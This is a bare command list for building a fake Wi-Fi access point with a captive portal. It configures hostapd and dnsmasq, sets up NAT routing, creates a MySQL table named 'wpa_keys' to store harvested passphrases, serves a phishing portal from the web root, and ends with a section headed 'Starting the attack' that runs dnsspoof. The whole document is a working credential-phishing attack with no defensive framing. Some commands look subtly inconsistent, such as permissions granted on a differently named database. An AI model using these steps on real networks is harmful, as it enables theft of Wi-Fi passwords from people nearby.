# --- Preparing ---: apt-get update apt-get install hostapd dnsmasq apache2 airmon-ng start wlan0 mkdir ~/fap cd ~/fap nano hostapd.conf # Instructions for hostapd.conf: interface=[INTERFACE NAME] driver=nl80211 ssid=[WiFi NAME] hw_mode=g channel=8 macaddr_acl=0 ignore_broadcast_ssid=0 nano dnsmasq.conf # Instructions for dnsmasq.conf: interface=[INTERFACE NAME] dhcp-range=192.168.1.2, 192.168.1.30, 255.255.255.0, 12h dhcp-option=3, 192.168.1.1 dhcp-option=6, 192.168.1.1 server=8.8.8.8 log-queries log-dhcp listen-address=127.0.0.1 # Routing table and gateway: ifconfig wlan0mon up 192.168.1.1 netmask 255.255.255.0 route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 # Internet access: iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE iptables --append FORWARD --in-interface wlan0mon -j ACCEPT echo 1 > /proc/sys/net/ipv4/ip_forward # mysql database: service mysql start mysql create database fap; create user fapuser; grant all on rogueap.* to 'fapuser'@'localhost' identified by 'fappassword'; use fap; create table wpa_keys(password1 varchar(40), password2 varchar(40)); ALTER DATABASE fap CHARACTER SET 'utf8'; select * from wpa_keys; # Captive portal setup: rm -rf /var/www/html/* mv ~/Downloads/fap.zip /var/www/html cd /var/www/html unzip fap.zip service apache2 start # --- Starting the attack ---: hostapd hostapd.conf dnsmasq -C dnsmasq.conf -d dnsspoof -i wlan0mon